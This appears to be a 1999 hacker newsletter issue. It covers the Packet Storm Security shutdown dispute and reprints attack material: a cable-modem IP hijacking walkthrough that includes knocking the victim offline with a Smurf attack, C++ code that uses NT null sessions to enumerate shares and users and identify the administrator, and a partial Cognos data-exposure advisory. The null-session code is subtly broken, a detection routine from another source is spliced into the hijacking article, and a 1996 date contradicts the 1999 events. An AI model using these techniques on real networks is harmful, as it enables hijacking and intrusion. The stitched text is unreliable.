The result: the server and the web site and its contents are permanently offline, I have no access to even retrieve anything off of the server, the site known as "Packet Storm Security" is history now.

I was told by Leo Donnelly at Harvard, via phone, that ALL of the content AND the backups made are either destroyed, being destroyed now, or will be before I can do anything to prevent it. All 4+ GB of files in the publicly accessible directories, over 45,000 files collected and archived over the years, are gone. There was another 4 GB that was composed of research data, customized IDS, Linux, Apache software, etc too.
Harvard is facing a lawsuit from JP, I am facing a lawsuit from JP, and possibly some sort of legal action from Harvard. Harvard seems to be trying to free themselves of any liability, and use me as the fall guy for this whole thing. All agreements with Harvard in the beginning were verbal (with Jeff Gray, the senior sysadmin), so I've got nothing on paper to back up the truth. I've got emails, but I don't have the money or legal defense to counter Harvard, or anybody else for that matter. This has turned really ugly, really quickly, and it is very plausible that I will be facing charges involving "hacking" or computer crimes of some sort, because I "never had a Harvard ID, and thus was not authorized to use their facilities", and I "compromised their security." I guess it doesn't matter that I was contacted by the Senior Sysadmin at Harvard and invited to move my site there. It doesn't matter that the head of Harvard UIS approved of everything. It doesn't matter that he placed the box on a subnet of his choosing and called me and gave me the root password and told me I had free rein on the box. It doesn't matter that Harvard network security was never actually compromised. For the record, Jeff Gray, the Harvard senior sysadmin, has been extremely supportive of my site and work from the beginning, and he deserves ALOT of credit for going out of his way to help keep Packet Storm Security alive and online. In fact, Jeff Gray has provided so much support for "the security community" in general, and is so supportive of security-related research and projects, that he deserves all the credit in the world for his efforts. I hope Harvard gives him the credit he is due, because any network security they have is in large part due to his skills, devotion, and diligence. If that's not enough to annoy me, all of my class work for the class I'm taking at NCSU this summer (CSC499 Independent Research project involving IDS) is/was on that server at Harvard and gone now too. 
With 4 weeks left in the semester here at NCSU, I have just lost seven weeks of work and data that cannot be replaced in 4 weeks. What bothers me the most is that all of the countless hours I put into that web site and the archives, thousands of hours, are gone now, for good. The site was getting over 400,000 hits/day and doing about 10 GB/day in transfers, so I don't see it coming back online even if I do get any of the site content back. Obviously, I have taken full responsibility for the site content and all activities and events associated with that server. Even though no laws or rules were broken, on my part, and to my knowledge, I am now facing possible legal action from both JP and Harvard, and state/federal computer crime charges as well. What am I going to do now? I don't know. The web site I devoted most of my waking hours to is gone. My chances of passing my CSC499 class do not look good, according to the negative comments from my professor. I'll try to salvage the summer's worth of course work anyway if possible and pass. Until formal charges are filed, I've still got my job and account here at NCSU. When NCSU catches wind of this, and I'm sure they will, my account probably will be permanently revoked, and my job and the past three years of school will then be gone too. Until then, I can be contacted at the email address in the sig below. Check out the news and history of John Vranesevich and Carolyn Meinel's smear and harassment campaigns that have ruined the careers and lives of many people, mine included. www.attrition.org has all of the details. 
Funny how I spent the past few years donating my time, literally thousands and thousands of hours, to "the security community", never asking for or making a single penny off the time and work I invested, and have now lost it all because John Vranesevich and a few of his IRC friends are able to make quick phone calls, fabricate absurd stories about criminal activity, libel, threaten to sue Harvard, and I don't even get to plead my case. I am guilty without even being informed of what was going on. He has effectively ruined years of my work, my education, my career, my life.

There are really only four things that I'd like right now:

1. Justice
2. Truth
3. The 3 GB of MY data that Harvard has and refuses to turn over to me
4. A job in the IT/IS/IW industries - the pay doesn't even matter, I'm willing to move, I'm willing to put in 60-80 hour weeks. Just give me a UNIX or Linux box to work from.

I'll settle for just the job though, and like I said, the pay doesn't matter - I love computers, network security, and systems administration. If I was not doing it for pay, I'd be doing it for free.

See you at BlackHat and DEFCON.

take it easy,

Ken Williams
jkwilli2@unity.ncsu.edu

if you need to reach me by phone, email me at jkwilli2@unity.ncsu.edu and CC the email to packetstorm@genocide2600.com with phone # request.

my pgp keys are available on all of the regular keyservers, and at www4.ncsu.edu/~jkwilli2/

[Note: yes, you can quote or print any part of or the whole email.]
Ken Williams
ken@packetstorm.harvard.edu
Packet Storm Security
http://packetstorm.harvard.edu

***************************************************************************

-=-

Net Thug Shuts Down Largest Free Security Site
Wed Jun 30 16:36:10 MDT 1999
ATTRITION Staff

Earlier today, the PacketStorm Security site was abruptly shut down with no warning. PacketStorm (packetstorm.harvard.edu) was one of the largest and most respected sites catering to security professionals worldwide. Boasting an average of 400,000 hits a day, pushing out roughly 10 gigs of traffic, the site was a valuable resource to an estimated 10,000 security professionals world wide.

The security resource did not suffer at the hands of hackers or network intruders. Instead, a new kind of malicious criminal found success through a fear that haunts more and more Americans today. A single piece of email from John Vranesevich (founder of AntiOnline) to the educational institution hosting Packetstorm threatened a lawsuit if the site was not shut down. Harvard said there were "numerous" complaints, but provided no additional details.

Like most US institutions, the idea of being dragged to court for any reason is enough to scare them into hasty action. With that mail, Harvard pulled the plug. This decision was no doubt made as an easy alternative to spending time and resources fighting the claims.
Email from Ken Williams, primary administrator for the site, to Attrition staff indicated that not only did Harvard shut down the site, they denied him access to the machine and all information stored on it. The correspondence noted the likelihood that all information on the machine, and all backups would be destroyed in order to avoid the AntiOnline lawsuit.

"All of the content and the backups made are either destroyed, being destroyed now, or will be before I can do anything to prevent it." said PacketStorm founder Ken Williams.

Williams went on to say that he does not fear any fraudulent lawsuit Vranesevich could attempt to level at him. The information contained on the site regarding Vranesevich was not in violation of any US law that he was aware of, and had been there for over a year.

Along with the security site, months of Williams' own school work was lost. "I have just lost seven weeks of [class] work and data that cannot be replaced in 4 weeks." Williams said, referring to deadlines on the school work.

     "What bothers me the most is that all of the countless hours I put into that web site and the archives, thousands of hours, are gone now, for good."
     - Ken Williams, PacketStorm founder

These vague and unfounded legal threats only serve to hurt the security community. AntiOnline's mission statement claims they exist "to educate the public on computer security related issues." Apparently, this mission statement forgot to include such things like "educate the public through OUR site only" and "as long as we profit from it".
***************************************************************************

JP has since offered this news:

http://www.antionline.com/archives/editorials/packetstorm.html

( Likely suffering major DoS attacks in result of their actions I was unable to get thru to the site to read their shit for posting here...they will burn in hell for this action - Ed )

Ok I cut thru the cruft, here's JP's 'story';

PacketStorm Is Shut Down
An AntiOnline Editorial
Thursday, July 01 1999

Apparently for some time now, PacketStorm Security, a popular underground collection of security related tools and information, has been maintaining a vast archive of materials about AntiOnline. These materials included entire stories, copies of the weekly mailbag, e-mails, and other materials copyrighted by AntiOnline LLP.

On top of that, and what was far more serious, the site contained dozens and dozens of items which included: e-mails, messages, documents, images, and even public surveys. These materials were libelous, and in some cases, were blatant threats against members of my immediate family, myself, and my company.

While I value the right to free speech as much, if not more, than the average American, I do not believe in individuals posting threatening and harassing documents about another individual, and their family members.

It was for this reason, and no other, that I contacted Harvard University, which was hosting the PacketStorm Website, and requested that it be shut down. I did not threaten legal action, but simply directed University Administration to the website, for them to view, and to judge, on their own. Below is a copy of that letter:

     Greetings:

     May I first say that I did my best to see that this letter got sent to the appropriate individuals. I had some difficulty determining who those individuals may be, so if I have made an error, I would greatly appreciate it if you would forward this letter on to the appropriate individual(s).
     My name is John Vranesevich, and I am the Founder and General Partner of AntiOnline LLP, a computer security company based outside of Pittsburgh, PA.

     Earlier today, one of my colleagues forwarded me the following URL: http://packetstorm.harvard.edu/jp/

     Needless to say, I was shocked and outraged at what I saw. This page contains a large archive of libelous and, to put it bluntly, sick material. Everything from archives of copyrighted material from our website, to altered pictures of my family, to 'stories' about me which contain images ranging from people engaged in homosexual activities, to a nun that appears to be covered in seminal fluid.

     I am astounded that an institution as prestigious as Harvard would be party to the dissemination of this type of material. It is my hope that the University Administration was unaware of this site, and now that it has been brought to their attention, it is my hope that it will be dealt with promptly.

     I have worked to help several educational institutions develop 'Acceptable Use Policies', and if Harvard is similar to them, the above URL would be a clear violation of that policy.

     It is my hope that the above mentioned domain will be shut down immediately, and that the individual responsible will be seriously reprimanded.

     I hope to hear from you soon about this matter, and what you may have done regarding it.

     Yours In CyberSpace,
     John Vranesevich
     Founder, AntiOnline

Tonight, Ken Williams, the founder of Packet Storm Security, released a letter to the public. The letter read in part:

     Funny how I spent the past few years donating my time, literally thousands of hours, to "the security community", never making even a penny off the time and work I invested, and have now lost it all because some asshole named John Vranesevich is able to make a quick phone call, fabricate absurd stories about criminal activity and bullshit I never did, and effectively ruin years of work, my education, my career, my life.
Ken, I know what it's like to dedicate many, many, thankless hours into a project, believe me. But, you did not lose your site because of me, you lost it because of you. I could not stand by and watch your site be used as a platform to harass and threaten my family, myself, and the business which I have worked hard to start. While you, and others who 'follow you' may criticize me for what I did, I think everyone that's reading this, who has family members that they love, and a career that they enjoy, will admit to themselves that if in my shoes, they would have done at least the same. I hold absolutely no grudge towards you as a person, and I hope that you have the best of success in all that you do.

Due to the types of threats that I have been receiving, and that sites like PacketStorm have been propagating, local law enforcement agencies were put on alert, and began doing extensive extra patrolling of the residence of my family members, my own residence, and the AntiOnline Offices.

I realize that the actions that I have taken against PacketStorm may greatly increase the immediate threat against my family, myself, and my company; and that the harassment will now only get worse. However, I will not allow my family, myself, nor my company to become a victim. I am standing my ground, and will continue AntiOnline's mission of putting an end to malicious hackers.

     People in this country have the right to say and do whatever they please, unless that is, what they say and do infringes on the rights of another - anonymous.

Yours In CyberSpace,
John Vranesevich
Founder, AntiOnline

-=-

***************************************************************************

Packetstorm mirror site announced at HNN: http://packetstorm.nl.linux.org/

" Support for Ken Williams Continues to Grow

contributed by Space Rogue

The outpouring of support for Ken Williams and Packet Storm Security has been phenomenal.
One such item of support has been the beginning of an effort to rebuild PSS from scratch as a grassroots effort. The organizer of this is asking anyone who ever downloaded a file from PSS to upload it here.

PacketStorm Mirror
http://packetstorm.nl.linux.org/

***************************************************************************

Statement from Harvard:
=======================

* S T A T E M E N T *

As a service to the Internet community, Harvard agreed to host a Packet Storm Security Website for security-related materials only. Without Harvard's knowledge, unrelated content was put on the Harvard server, including sexually-related material and personal attacks on an individual not affiliated with the University. A Harvard administrative site focused on security issues is not the forum for this type of material. We are returning the content on the site and hope that Packet Storm will make its security tools available through its own Website.

Joe Wrinn
Director
Office of News and Public Affairs

Joe Wrinn
Director, Harvard News Office
1350 Massachusetts Ave., Rm. 1060
Cambridge, MA 02138

***************************************************************************

Ken's Rebuttal to the Harvard statement;

Date: 7/1/99 17:58
Received: 7/1/99 18:01
From: Ken Williams, jkwilli2@unity.ncsu.edu

Hi,

[The Harvard] statement is incorrect, and even libelous itself by implying that I had "sexually related material" on the server. I NEVER did!

NOW, I will retain legal counsel. This is outrageous! I wouldn't have been surprised to find myself slandered by John Vranesevich and AntiOnline, but to have Harvard implicitly state that I was serving up "sexually related material" to the Internet is absurd, libelous, and legally reprehensible.

Are you, Harvard, trying to ruin my reputation and career now too?
It sounds to me like you are fabricating this "sexually related material and personal attacks" statement to appease your critics, and, as I (now ominously) mentioned in my first open letter, trying to use me as the fall guy.

Regretfully,

Ken Williams

***************************************************************************

ZDNet;

ZDNN: Harvard caught in hacker crossfire
Tue, 01 April 1996 18:29:02 GMT

Harvard University is caught in the middle of an online war between hacking-scene follower AntiOnline.com and the hacking community at large.

On Wednesday, the Cambridge, Mass., university removed an independent security Web site, known as Packet Storm, which it had been mirroring on its servers for only 10 days.

The reason: A directory of material hidden in the Web site, and thus on Harvard's servers, that had "sexually related material and personal attacks on an individual not affiliated with the University," said Joe Wrinn, director of news and public affairs for Harvard, in a statement released by Harvard on Thursday.

"We agreed to have a site that had security-related materials only," said Wrinn. "Both parties involved were using us in a way that was completely inappropriate."

Ken Williams, a North Carolina State University employee and the Webmaster of Packet Storm, angrily refuted the allegations. "This statement is incorrect, and even libelous itself by implying that I had 'sexually related material' on the server," he wrote in an e-mail. "I never did!"

According to Williams, the directory -- labeled "/jp" because it was a collection of material satirizing AntiOnline founder and chief John P. Vranesevich -- had a parody of the AntiOnline site. But others familiar with the site said that the parody also contained photos of nude women that were intended to be more sarcastic than sexual.

Harvard obviously didn't get the joke. Harvard's Wrinn did not know specifically what sort of "sexual" content was contained on the site.
Harvard in the hot seat

"We are in the middle of this and it's inappropriate," said Harvard's Wrinn, sounding distinctly uncomfortable with the attention that the issue was attracting. Harvard intends to send the complete contents of the site back to Williams so that he can post it elsewhere.

No wonder: Packet Storm wasn't just a small-time site -- it had been the place to go for both hackers and security experts to get up-to-date security information.

"Packet Storm was a huge compilation of security tools," said Brian Martin, known as "Jericho," one of the Webmasters at hacker news and information site Attrition.org. "It was updated daily with tools. It was always there."

Among organizations that used and mirrored the site: The Department of Defense and the Federal Bureau of Investigation, claimed Webmaster Williams.

'I didn't have an anti-J.P. Temple of Hate'

Yet, Williams had also sided with many others in hacker circles who have been waging a war -- of mainly -- words against AntiOnline's Vranesevich and his latest ally, Caroline Meinel, security researcher and webmaster of The Happy Hacker.

"I didn't have an anti-J.P. Temple of Hate or anything," said Williams. "But there are companies, organizations, and individuals out there that ;we believe; are black-eyes of the industry."

So, Williams attached a non-public directory to the Web site that archived parodies and criticisms of AntiOnline's founder.

The directory represented a single facet of a complex war of image in the hacker not-so-underground. For the most part, AntiOnline and its main foe, Attrition.org, have squared off with conflicting allegations of slander, libel and plagiarism.

     'I am kind of disappointed that an institution like Harvard was so quick to pull the plug just to avoid a potential suit.'

"I can understand a parody -- I have no problem with that," said the 20-year-old Pennsylvania Webmaster, adding that he thought Williams acknowledged that the photos had been put up, but that since they had come from a source already online, the Packet Storm Webmaster thought the pictures were fair game.

Vranesevich's answer? The Webmaster notified Harvard of the hidden directory in a letter to the university's provost -- and Harvard quickly took the site down.

Did Harvard act too quickly?

B.K. DeLong, a Boston-based computer security consultant, thought Harvard acted too quickly. "I am kind of disappointed that an institution like Harvard was so quick to pull the plug just to avoid a potential suit," he said.

Yet Harvard wasn't the only one to act quickly. By late Wednesday night, the Keebler Elves -- the cybergang that claimed responsibility for hacking into the National Oceanic and Atmospheric Administration last week -- defaced another government Web site with the news.

"Now, because of; JP ... Packetstorm is no more, and never will be again," the site http://www.aao.uc.usbr.gov/ lamented.

Unnamed hackers also struck at AntiOnline more directly. AntiOnline's site came under a denial-of-service attack -- which floods a particular site with random data -- so severe that its Internet service provider pulled the site for almost 12 hours on Thursday, said Vranesevich.

Ugly threats

Other attacks were even less friendly. "I have received more death threats in the last 24 hours by phone, than I have in five years," he said.

Not quite an apology, Vranesevich added that he never intended the entire Packet Storm site to be taken down. "I know what it's like to have the university stomp its foot down on you. When I was a student at the University of Pittsburgh, I had my Web site shut down," he said. "But I never threatened anyone."

In his mind, the contents of "/jp" did.
@HWA

03.0 Cable Modem Hijacking from www.hackcanada.com
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/

Cable Modem IP Hijacking in Win95/98

The purpose of this is to show you how bad cable modem security is and that even with a win box you can take someone else's IP. You can hijack IP's using a cable modem and it's very simple in any operating system. Just follow the steps:

1) Choose someone's IP that you wish to have. Make sure the IP is on the same network. Most cable modem providers use DHCP. The first thing you have to do is find the victim's IP. Remember the victim's IP has to be in the same network and with the same service provider for this to work.

2) Now this is probably the hardest thing in this file (but it's still easy), you have to wait until the victim's computer is off or you can Smurf kill his connection. When you think his computer is off-line just try to ping it to see if you get a response. Do this by going to a DOS prompt and typing ping (victim's IP). If you get a response then you have to try harder. After you get his PC off-line then you go into your network properties and edit the IP settings, but instead of having yours there you put the victim's IP, host, and domain.

3) Restart. If you restart and you get an IP conflict this means that the victim's computer is on, if you don't get an IP conflict then try to go to your web browser and see if it works. With some cable modem providers you might have to also add the Gateway, Subnet mask (255.255.55.0), Host, DNS search, and Domain.

Now you can go. Everything will work until the victim's PC is back on. Once it is back online it will take the IP away because it will tell you that you have the wrong MAC address.

*Linux*

This is also possible in Linux, but is not the best way. You can change your MAC address to the victim's PC and this is more secure and much easier. There are a couple of scripts to change your address, just look around.
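How an operator can catch the takeover described above, as an added example rather than anything from the original article: it checks (IP, MAC) pairs seen on the wire against the DHCP lease table, and covers the cloned-MAC variant from the Linux note by also comparing the cable modem each pair arrived through. The addresses, the modem identifiers and the assumption that every sighting is tagged with its modem are constructed for this example.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* A DHCP lease as the provider's server recorded it. */
struct lease    { const char *ip, *mac, *modem; };
/* An (IP, MAC) pair seen on the wire, tagged with the modem it came through
   (the modem tag is an assumption of this example). */
struct sighting { const char *ip, *mac, *modem; };

enum verdict { MATCHES_LEASE, NO_LEASE_FOR_IP, MAC_MISMATCH, MODEM_MISMATCH };

/* Constructed sample data: documentation addresses, hypothetical modem ids. */
static const struct lease LEASES[] = {
    { "192.0.2.10", "00:00:5e:00:53:0a", "modem-A" },
    { "192.0.2.11", "00:00:5e:00:53:0b", "modem-B" },
};
static const struct sighting SIGHTINGS[] = {
    { "192.0.2.10", "00:00:5E:00:53:0A", "modem-A" }, /* lease holder, upper-case MAC   */
    { "192.0.2.11", "00:00:5e:00:53:0a", "modem-A" }, /* B's IP typed into A's PC       */
    { "192.0.2.11", "00:00:5e:00:53:0b", "modem-A" }, /* B's MAC cloned behind modem A  */
    { "192.0.2.99", "00:00:5e:00:53:0c", "modem-C" }, /* static address never leased    */
};
#define N_LEASES    (sizeof LEASES / sizeof LEASES[0])
#define N_SIGHTINGS (sizeof SIGHTINGS / sizeof SIGHTINGS[0])

/* MAC strings compare equal regardless of hex digit case. */
static int mac_equal(const char *a, const char *b)
{
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return 0;
    return *a == *b;
}

/* Compare one sighting with the lease table. */
enum verdict check_sighting(const struct lease *leases, size_t n,
                            const struct sighting *s)
{
    size_t i;
    for (i = 0; i < n; i++) {
        if (strcmp(leases[i].ip, s->ip) != 0)
            continue;
        if (!mac_equal(leases[i].mac, s->mac))
            return MAC_MISMATCH;     /* IP set by hand on another machine */
        if (strcmp(leases[i].modem, s->modem) != 0)
            return MODEM_MISMATCH;   /* right MAC, wrong place: cloned MAC */
        return MATCHES_LEASE;
    }
    return NO_LEASE_FOR_IP;          /* address in use that DHCP never issued */
}

/* Number of sightings that do not match their lease. */
size_t count_flagged(const struct lease *leases, size_t n,
                     const struct sighting *s, size_t m)
{
    size_t i, flagged = 0;
    for (i = 0; i < m; i++)
        if (check_sighting(leases, n, &s[i]) != MATCHES_LEASE)
            flagged++;
    return flagged;
}

int main(void)
{
    static const char *names[] = { "ok", "no lease for IP",
                                   "MAC differs from lease",
                                   "leased MAC seen behind another modem" };
    size_t i;
    for (i = 0; i < N_SIGHTINGS; i++)
        printf("%-12s %s via %s: %s\n", SIGHTINGS[i].ip, SIGHTINGS[i].mac,
               SIGHTINGS[i].modem,
               names[check_sighting(LEASES, N_LEASES, &SIGHTINGS[i])]);
    return 0;
}
```

The MAC comparison alone catches the Win95/98 procedure; only the modem comparison catches a cloned MAC, which is why the lease table here records where each lease was handed out.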
Warning: Some cable modem service providers will know when you're using the wrong IP, but hey, it might be useful.

Copyright (c) 1999 Wildman
www.hackcanada.com

@HWA

04.0 Exploiting Null Session Weaknesses in NT environment
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/

Details About NULL Sessions

This page is a detailed explanation for programmatically connecting to NT Server NULL Sessions and extracting the name of the true administrator account. Even non-programmer Admins should read through this and become familiar with the API's explained in order to better understand the NT environment and recognize code that might be used against them.

The original purpose of NULL sessions is to allow unauthenticated hosts to obtain browse lists from NT servers and participate in MS networking. Mostly this is useful for Win95/98/NT hosts who are not domain members, but still need to obtain browsing information. The problem occurs in cases where a NULL session becomes included in the everyone group and now has access to resources to which they weren't authenticated, but that the authenticated group had permissions for.

Originally, 'everyone' did not mean 'anyone'. You still had to log on to be in the everyone group. However, NULL Sessions are the one case where 'everyone' could mean 'anyone'. This is the reason MS created the *NEW* Authenticated group. The Authenticated group does not include NULL Sessions and so can never mean 'anyone' - until someone finds an exploit.

The following code segments are commented to show exactly what is happening, what API's are being used, and how the true administrator name can be identified.

First - making a NULL Session connection

One way to do this is by using the Net Use command with an empty password. Programmatically, it looks like this....
#include <afxwin.h>   // MFC: CString
#include <afxcmn.h>   // MFC: CTreeCtrl, HTREEITEM
#include <lm.h>       // NetUseAdd, NetShareEnum, NetUserEnum, NetApiBufferFree

//CNTOHunterDlg is the tool's own dialog class; m_Victims is its tree control.
//Prototype for the user-listing wrapper defined further down
void DoNetUserEnum(const wchar_t* pServer, CNTOHunterDlg* pDlg,
                   HTREEITEM userRoot, HTREEITEM adminRoot);

//This function called from dialog that fills listbox with connections
BOOL EstablishNullSession(CString TargetHost, CNTOHunterDlg* pDlg)
{
    //Setup for UNICODE
    char* pTemp = TargetHost.GetBuffer(256);
    WCHAR wszServ[256];
    LPWSTR Server = NULL;

    //Convert to Unicode
    MultiByteToWideChar(CP_ACP, 0, pTemp, strlen(pTemp)+1,
                        wszServ, sizeof(wszServ)/sizeof(wszServ[0]) );

    //Create the IPC$ share connection string we need
    Server = wszServ;
    LPCWSTR szIpc = L"\\IPC$";
    WCHAR RemoteResource[UNCLEN + 5 + 1]; // UNC len + \IPC$ + NULL
    DWORD dwServNameLen;
    DWORD dwRC;

    //Setup Win32 structures and variables we need
    NET_API_STATUS nas;
    USE_INFO_2 ui2;
    SHARE_INFO_1* pSHInfo1 = NULL;
    DWORD dwEntriesRead;
    DWORD dwTotalEntries;

    //Set up handles to tree control to insert connection results
    //(NULL until the matching tree item has been created)
    HTREEITEM machineRoot = NULL, shareRoot = NULL, userRoot = NULL,
              adminRoot = NULL, attribRoot = NULL;
    char sharename[256];
    char remark[256];

    if(Server == NULL || *Server == L'\0')
    {
        SetLastError(ERROR_INVALID_COMPUTERNAME);
        return FALSE;
    }

    dwServNameLen = lstrlenW( Server );

    //Test for various errors in connection string and recover
    if(Server[0] != L'\\' && Server[1] != L'\\')
    {
        // prepend slashes and NULL terminate
        RemoteResource[0] = L'\\';
        RemoteResource[1] = L'\\';
        RemoteResource[2] = L'\0';
    }
    else
    {
        dwServNameLen -= 2; // drop slashes from count
        RemoteResource[0] = L'\0';
    }

    if(dwServNameLen > CNLEN)
    {
        SetLastError(ERROR_INVALID_COMPUTERNAME);
        return FALSE;
    }

    if(lstrcatW(RemoteResource, Server) == NULL) return FALSE;
    if(lstrcatW(RemoteResource, szIpc) == NULL) return FALSE;

    //Start with clean memory
    ZeroMemory(&ui2, sizeof(ui2));

    //Fill in the Win32 network structure we need to use connect API
    ui2.ui2_local = NULL;
    ui2.ui2_remote = (LPTSTR) RemoteResource;
    ui2.ui2_asg_type = USE_IPC;
    ui2.ui2_password = (LPTSTR) L""; //SET PASSWORD TO NULL
    ui2.ui2_username = (LPTSTR) L"";
    ui2.ui2_domainname = (LPTSTR) L"";

    //MAKE THE NULL SESSION CALL
    nas = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL);
    dwRC = GetLastError();
    if( nas == NERR_Success )
    {
        machineRoot = pDlg->m_Victims.InsertItem(TargetHost, 0, 0, TVI_ROOT);
    }

    //THIS IS WHERE NT HANDS OUT ITS INFORMATION
    nas = NetShareEnum((char*)Server, 1, (LPBYTE*)&pSHInfo1,
                       MAX_PREFERRED_LENGTH, &dwEntriesRead,
                       &dwTotalEntries, NULL);
    dwRC = GetLastError();
    if( nas == NERR_Success )
    {
        if(dwTotalEntries > 0)
        {
            shareRoot = pDlg->m_Victims.InsertItem("Shares", machineRoot,TVI_LAST);
            userRoot = pDlg->m_Victims.InsertItem("Users", machineRoot,TVI_LAST);
            adminRoot = pDlg->m_Victims.InsertItem("Admin", machineRoot,TVI_LAST);
        }

        //Walk a copy of the pointer so the buffer itself can be freed below,
        //and stop at the number of entries actually returned
        SHARE_INFO_1* pShare = pSHInfo1;
        for(int x=0; x<(int)dwEntriesRead; x++)
        {
            // Convert back to ANSI
            WideCharToMultiByte(CP_ACP, 0,
                                (const unsigned short*)pShare->shi1_netname, -1,
                                sharename, 256, NULL, NULL );
            WideCharToMultiByte( CP_ACP, 0,
                                (const unsigned short*)pShare->shi1_remark, -1,
                                remark, 256, NULL, NULL );

            CString ShareDetails = sharename;
            ShareDetails = ShareDetails + " - " + remark;

            //fill the tree with connect info
            attribRoot = pDlg->m_Victims.InsertItem(ShareDetails, shareRoot,TVI_LAST);
            pShare++;
        }
    }

    //Release the buffer NetShareEnum allocated
    if(pSHInfo1 != NULL)
        NetApiBufferFree(pSHInfo1);

    //My Wrapper function for listing users - see below
    DoNetUserEnum(Server, pDlg, userRoot, adminRoot);

    //WE ARE DONE, SO KILL THE CONNECTION
    nas = NetUseDel(NULL, (LPTSTR) RemoteResource, 0);

    TargetHost.ReleaseBuffer();
    SetLastError( nas );
    return FALSE;
}

The following function is how one can programmatically determine the administrator status of an account......
bool GetAdmin(char* pServer, char* pUser, CString& Name) { BOOL fAdmin = FALSE; DWORD dwDomainName,dwSize,dwAdminVal; SID_NAME_USE use; PSID pUserSID = NULL; // SID for user int rc; int iSubCount; bool bFoundHim = 0; dwDomainName = 256; dwSize = 0; dwAdminVal = 0; iSubCount = 0; //Call API for buffer size since we don't know size beforehand rc = LookupAccountName(pServer, pUser, pUserSID, &dwSize, szDomainName, &dwDomainName, &use ); rc = GetLastError(); //Allocate a larger buffer if(rc == ERROR_INSUFFICIENT_BUFFER) { pUserSID = (PSID) malloc(dwSize); //Repeat call now that we have the right size buffer rc = LookupAccountName(pServer, pUser, pUserSID, &dwSize, szDomainName, &dwDomainName, &use ); } //Scan the SIDS for the golden key - ADMIN == 500 //Get a count of SID's iSubCount = (int)*(GetSidSubAuthorityCount(pUserSID)); //Admin SID is the last element in the count dwAdminVal = *(GetSidSubAuthority(pUserSID, iSubCount-1)); if(dwAdminVal==500) //TEST TO SEE IF THIS IS THE ADMIN { Name.Format("Admin is %s\\%s\n", szDomainName, pUser); bFoundHim = true; } delete pUserSID; return bFoundHim; //WE KNOW WHO HE IS, ADD HIM TO THE TREE } Wrapper for Listing the user accounts..... 
void DoNetUserEnum(const wchar_t* pServer, CNTOHunterDlg* pDlg, HTREEITEM userRoot, HTREEITEM adminRoot) { USER_INFO_10 *pUserbuf, *pCurUser; DWORD dwRead, dwRemaining, dwResume, dwRC; char userName[256]; char userServer[256]; dwResume = 0; if(pServer[0] != L'\\' && pServer[1] != L'\\') { //Start sting with correct UNC slashes and NULL terminate RemoteResource[0] = L'\\'; RemoteResource[1] = L'\\'; RemoteResource[2] = L'\0'; } else { dwServNameLen -= 2; // drop slashes from count RemoteResource[0] = L'\0'; } if(dwServNameLen > CNLEN) { SetLastError(ERROR_INVALID_COMPUTERNAME); return; } if(lstrcatW(RemoteResource, pServer) == NULL) return; do { pUserbuf = NULL; //THIS IS THE API THE NT USES TO HAND OUT IT's LIST dwRC = NetUserEnum(RemoteResource, 10, 0, (BYTE**) &pUserbuf, 1024, &dwRead, &dwRemaining, &dwResume); if (dwRC != ERROR_MORE_DATA && dwRC != ERROR_SUCCESS) break; DWORD i; for(i = 0, pCurUser = pUserbuf; i < dwRead; ++i, ++pCurUser) { // Convert back to ANSI. WideCharToMultiByte( CP_ACP, 0, pCurUser->usri10_name, -1, userName, 256, NULL, NULL ); // Convert back to ANSI. WideCharToMultiByte( CP_ACP, 0, pServer, -1, userServer, 256, NULL, NULL ); if(!GotAdmin) { //use char strings CString Admin; GotAdmin = GetAdmin(userServer, userName, Admin); if(GotAdmin) { Admin.TrimRight(); HTREEITEM adminChild = pDlg->m_Victims.InsertItem(Admin, adminRoot, TVI_LAST); pDlg->m_Victims.EnsureVisible(adminChild); } } CString strUserName = userName; pDlg->m_Victims.InsertItem(strUserName, userRoot, TVI_LAST); } if (pUserbuf != NULL) NetApiBufferFree(pUserbuf); } while (dwRC == ERROR_MORE_DATA); if (dwRC != ERROR_SUCCESS) printf("NUE() returned %lu\n", dwRC); } Send mail to info@ntobjectives.com with questions or comments about this document. Copyright © 1999 NT OBJECTives, Inc. All Rights Reserved. All trademarks are the property of their respective owners. Last modified: June 28, 1999 @HWA 05.0 Cognos PowerPlay Web Edition security vunerability allows access to data cubes.. 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/

Date: Mon, 28 Jun 1999 07:29:37 -0400
From: Darin White
To: BUGTRAQ@netspace.org
Subject: Cognos PowerPlay Web Edition security

WEB SECURITY ADVISORY
-------------
Release Date:  1999-06-25
Application:   Cognos PowerPlay Web Edition
Severity:      Unauthenticated web users can sniff cube data
Author:        Darin White
Operating Sys: Microsoft NT Server
--------------

I. Description

Due to design problems as well as some potential web server misconfiguration PowerPlay Web Edition may serve up data cubes in a non-secure manner. Execution of the PowerPlay CGI pulls cube data into files in an unprotected temporary directory. Those files are then fed back to frames in the browser. In some cases it is trivial for an unauthenticated user to tap into those data files before they are purged. Cognos has been contacted but does not regard this as a serious exposure (see appendix B below).

The issues are:

(a) dynamic directory listing
(b) weak temporary filename algorithm
(c) ad hoc parameters to the CGI

II. Details

Identifying PowerPlay sites is quickly accomplished using AltaVista

http://www.altavista.com/cgi-bin/query?
pg=q&kl=XX&q=%2Blink%3Appdscgi.exe&search=Search
(join last two lines)

which hits all pages containing a link to the PowerPlay CGI ppdscgi.exe on NT.

Normal authentication for protected cubes occurs when a user selects a link like:

Example

At this point the user is prompted for a userid and password. Beyond this check there seems to be no verification that data is being fed out to the browser that requested it and was authorized.

(a) dynamic directory listing

Netscape Enterprise Server 3.5.1 appears to be serving up dynamic directory listings by default. A known PowerPlay site can be hit with a request for

http://www.example.com/ppwb/Temp/

which will return something like:

/ppwb/Temp/
-
6/25/99 9:17 AM 17904 1ad6t.htm
6/25/99 9:17 AM 37828 1ad6x.htm

